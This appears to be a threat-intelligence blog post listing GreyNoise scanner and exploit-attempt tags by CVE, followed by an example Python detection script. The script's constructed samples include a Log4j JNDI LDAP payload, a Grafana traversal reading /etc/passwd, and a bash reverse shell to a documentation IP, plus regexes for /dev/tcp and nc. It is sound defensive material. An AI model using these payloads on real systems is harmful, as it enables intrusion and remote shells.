While you will be able to find a comprehensive list of all the tags created since our last round up below, the GreyNoise Research team wanted to highlight some interesting tags.
Apache Log4j RCE Attempt [Intention: Malicious]
Self-explanatory.
Backdoor Connection Attempt via WinDivert [Intention: Malicious]
This tag was created this week as a result of the research done by the Avast team.
DNS Over HTTPS Scanner [Intention: Unknown]
DNS over HTTPS is a relatively new technology. Scanning the whole Internet for DoH resolvers is interesting precisely because there is no obvious reason to do it, and no clear motive that we can tell.
Microsoft HTTP.sys RCE Attempt [Intention: Malicious]
Critical vulnerability in the HTTP protocol stack (http.sys), a kernel-mode driver in Microsoft Windows.
VMware vCenter SSRF Attempt [Intention: Malicious]
Widely deployed management software for VMware vSphere virtualization environments.
Zoho ManageEngine ServiceDesk Plus msiexec RCE Attempt [Intention: Malicious]
A critical vulnerability in a popular help desk platform.
It has been a while since we last published a Tag Round Up! If these are helpful to you, or you have suggestions on what you would like to see, please reach out to community@greynoise.io
Antiwork Port 9100 Print Request [Intention: Unknown]
This IP address has been observed sending raw TCP requests to port 9100, the raw (JetDirect) printing port, on network printers.
Backdoor Connection Attempt via WinDivert [Intention: Malicious]
This IP address has been observed attempting to send a known activation secret "CB5766F7436E22509381CA605B98685C8966F16B" for a malicious backdoor utilizing WinDivert.
DNS Over HTTPS Scanner [Intention: Unknown]
This IP address has been observed attempting to scan for responses to DNS over HTTPS (DoH) requests.
Generic Unix Reverse Shell Attempt [Intention: Malicious]
This IP address has been observed attempting to spawn a generic Unix reverse shell via a web request.
iKettle Crawler [Intention: Unknown]
This IP address has been observed crawling the Internet and attempting to discover iKettle devices.
InfluxDB Crawler [Intention: Unknown]
This IP address has been observed crawling the Internet and attempting to discover InfluxDB instances.
IRC Crawler [Intention: Unknown]
This IP address has been observed sending the NICK and USER commands used to register a connection with an IRC server.
iSCSI Crawler [Intention: Unknown]
This IP address has been observed crawling the Internet and attempting to discover hosts that respond to iSCSI login requests.
Jira REST API Crawler [Intention: Unknown]
This IP address has been observed attempting to enumerate Jira instances via the Jira REST API.
Apache Druid RCE Attempt [Intention: Malicious]
CVE-2021-25646
This IP address has been observed attempting to exploit CVE-2021-25646, a remote command execution vulnerability in Apache Druid v0.20.0 and earlier.
Apache Log4j RCE Attempt [Intention: Malicious]
CVE-2021-44228 | CVE-2021-45046
This IP address has been observed attempting to exploit CVE-2021-44228 and CVE-2021-45046, remote code execution vulnerabilities in the popular Java logging library Apache Log4j. CVE-2021-44228 affects versions 2.0-beta9 through 2.14.1; CVE-2021-45046 affects versions 2.15.0 and earlier.
CentOS Web Panel RCE Attempt [Intention: Malicious]
This IP address has been observed attempting to exploit a vulnerability in CentOS Web Panel which can lead to privilege escalation and remote code execution.
FHEM LFI [Intention: Malicious]
CVE-2020-19360
This IP address has been observed attempting to exploit CVE-2020-19360, a local file inclusion vulnerability in the FHEM Perl home automation server.
GLPI SQL Injection Attempt [Intention: Malicious]
CVE-2019-10232
This IP address has been observed attempting to exploit CVE-2019-10232, an SQL injection vulnerability in the GLPI service management software.
Grafana Path Traversal Attempt [Intention: Malicious]
CVE-2021-43798
This IP address has been observed attempting to exploit CVE-2021-43798, a path traversal and arbitrary file read vulnerability in Grafana.
Grafana Path Traversal Check [Intention: Unknown]
CVE-2021-43798
This IP address has been observed attempting to check for the presence of CVE-2021-43798, a path traversal and arbitrary file read vulnerability in Grafana.
HRsale LFI [Intention: Malicious]
CVE-2020-27993
This IP address has been observed attempting to exploit CVE-2020-27993, a local file inclusion vulnerability in HRsale.
Metabase LFI Attempt [Intention: Malicious]
CVE-2021-41277
This IP address has been observed attempting to exploit CVE-2021-41277, a local file inclusion vulnerability in Metabase.
Microsoft HTTP.sys RCE Attempt [Intention: Malicious]
CVE-2021-31166
This IP address has been observed attempting to exploit CVE-2021-31166, a remote code execution vulnerability in the Windows HTTP protocol stack (http.sys).
Motorola Baby Monitor RCE Attempt [Intention: Malicious]
CVE-2021-3577
This IP address has been observed attempting to exploit CVE-2021-3577, a remote command execution vulnerability in Motorola Halo+ baby monitors.
NodeBB API Token Bypass Attempt [Intention: Malicious]
CVE-2021-43786
This IP address has been observed attempting to exploit CVE-2021-43786, a flaw in NodeBB that unintentionally allows master API token access and can lead to remote code execution.
October CMS Password Reset Scanner [Intention: Malicious]
CVE-2021-32648
This IP address has been observed attempting to exploit CVE-2021-32648, a password reset vulnerability in October CMS that allows account takeover.
TP-Link TL-WR840N RCE Attempt [Intention: Malicious]
CVE-2021-41653
This IP address has been observed attempting to exploit CVE-2021-41653, a remote command execution vulnerability in the TP-Link TL-WR840N EU v5 router.
VMware vCenter Arbitrary File Read Attempt [Intention: Malicious]
CVE-2021-21980
This IP address has been observed attempting to exploit CVE-2021-21980, an unauthorized arbitrary file read vulnerability in the vSphere Web Client (vCenter Server).
VMware vCenter SSRF Attempt [Intention: Malicious]
CVE-2021-22049
This IP address has been observed attempting to exploit CVE-2021-22049, a server-side request forgery vulnerability in the vSphere Web Client (vCenter Server).
WebSVN 2.6.0 RCE CVE-2021-32305 [Intention: Malicious]
CVE-2021-32305
This IP address has been observed scanning the Internet for hosts vulnerable to CVE-2021-32305, a remote code execution vulnerability in WebSVN 2.6.0 triggered by shell metacharacters in the search parameter.
Zimbra Collaboration Suite XXE Attempt [Intention: Malicious]
CVE-2019-9670
This IP address has been observed attempting to exploit CVE-2019-9670, an XML External Entity (XXE) vulnerability in Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10.
Zoho ManageEngine ServiceDesk Plus msiexec RCE Attempt [Intention: Malicious]
CVE-2021-44077
This IP address has been observed attempting to exploit CVE-2021-44077, an unauthenticated remote command execution vulnerability in Zoho ManageEngine ServiceDesk Plus before 11306, ServiceDesk Plus MSP before 10530, and SupportCenter Plus before 11014.
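Several of the tags in this round up boil down to a single observable pattern in the request: any traffic to port 9100, the WinDivert activation secret, an IRC NICK/USER registration pair, a Log4j JNDI lookup string, a traversal under a Grafana plugin path, or a reverse shell command carried in a web request. The Python script below, added here as an example and not GreyNoise's own tagging code, applies simplified versions of those rules to a handful of constructed sensor observations. The Observation shape, the rules, the Log4j de-obfuscation step, and every sample payload (including the indicator strings such as `${jndi:` and `/public/plugins/<name>/../`) are assumptions made for the example and say nothing about how GreyNoise actually implements these tags.

```python
"""Toy tagger for a few of the tags listed above.

Added example: this is not GreyNoise's tagging code. The Observation shape,
the rules, and every sample payload below are constructed for illustration.
"""
import re
from dataclasses import dataclass
from urllib.parse import unquote

# Activation secret quoted in the "Backdoor Connection Attempt via WinDivert" tag.
WINDIVERT_SECRET = "CB5766F7436E22509381CA605B98685C8966F16B"


@dataclass
class Observation:
    dst_port: int
    payload: str  # request bytes as text; a real pipeline would escape binary data


def normalize_log4j(text: str) -> str:
    """Undo the common lookup obfuscations (${lower:j}, ${upper:J}, ${::-j},
    ${env:NaN:-j}) so an obfuscated JNDI lookup collapses to a plain ${jndi: prefix."""
    previous = None
    while previous != text:  # repeat until nothing changes (handles nesting)
        previous = text
        text = re.sub(r"\$\{(?:lower|upper):([^${}]*)\}", r"\1", text, flags=re.I)
        text = re.sub(r"\$\{[^${}]*?:-([^${}]*)\}", r"\1", text)
    return text.lower()


def tag(obs: Observation) -> list[str]:
    """Return the names of the tags whose (simplified, assumed) rule matches."""
    tags = []
    raw = obs.payload
    decoded = unquote(raw)  # web payloads usually arrive URL-encoded

    if obs.dst_port == 9100:
        # Port 9100 is the raw/JetDirect printing port; anything sent there is a raw print request.
        tags.append("Antiwork Port 9100 Print Request")
    if WINDIVERT_SECRET.lower() in raw.lower():
        tags.append("Backdoor Connection Attempt via WinDivert")
    if re.search(r"^NICK \S+", raw, re.M) and re.search(r"^USER \S+", raw, re.M):
        tags.append("IRC Crawler")
    if "${jndi:" in normalize_log4j(decoded):
        tags.append("Apache Log4j RCE Attempt")
    if re.search(r"/public/plugins/[^/\s]+/\.\./", decoded):
        # The page separates a Grafana "Check" from an "Attempt"; this toy rule does not.
        tags.append("Grafana Path Traversal Attempt")
    if re.search(r"/dev/tcp/\d+\.\d+\.\d+\.\d+/\d+|\bnc\b.*\s-[ec]\s", decoded):
        tags.append("Generic Unix Reverse Shell Attempt")
    return tags


# Constructed sample observations (not real sensor data; 203.0.113.0/24 is a documentation range).
SAMPLES = [
    Observation(9100, "\x1b%-12345X@PJL INFO ID\r\n"),
    Observation(443, "POST /x HTTP/1.1\r\n\r\n" + WINDIVERT_SECRET),
    Observation(6667, "NICK probe123\r\nUSER probe 0 * :probe\r\n"),
    Observation(8080, "GET /?x=${${lower:j}ndi:ldap://203.0.113.5:1389/a} HTTP/1.1\r\n"),
    Observation(3000, "GET /public/plugins/alertlist/../../../../../../etc/passwd HTTP/1.1\r\n"),
    Observation(80, "GET /cgi-bin/x?cmd=bash%20-i%20%3E%26%20/dev/tcp/203.0.113.7/4444%200%3E%261 HTTP/1.1\r\n"),
    Observation(80, "GET / HTTP/1.1\r\nHost: example.com\r\n"),
]


def tag_samples() -> list[list[str]]:
    """Tag every constructed sample; the last (benign) one should get no tag."""
    return [tag(obs) for obs in SAMPLES]


if __name__ == "__main__":
    for obs, tags in zip(SAMPLES, tag_samples()):
        print(obs.dst_port, tags or "-")
```

The de-obfuscation loop matters more than the rest: a literal `${jndi:` match misses the `${${lower:j}ndi:` and `${::-j}` variants that were common within days of the Log4j disclosure, so any rule keyed on the JNDI prefix should normalize first and then compare case-insensitively.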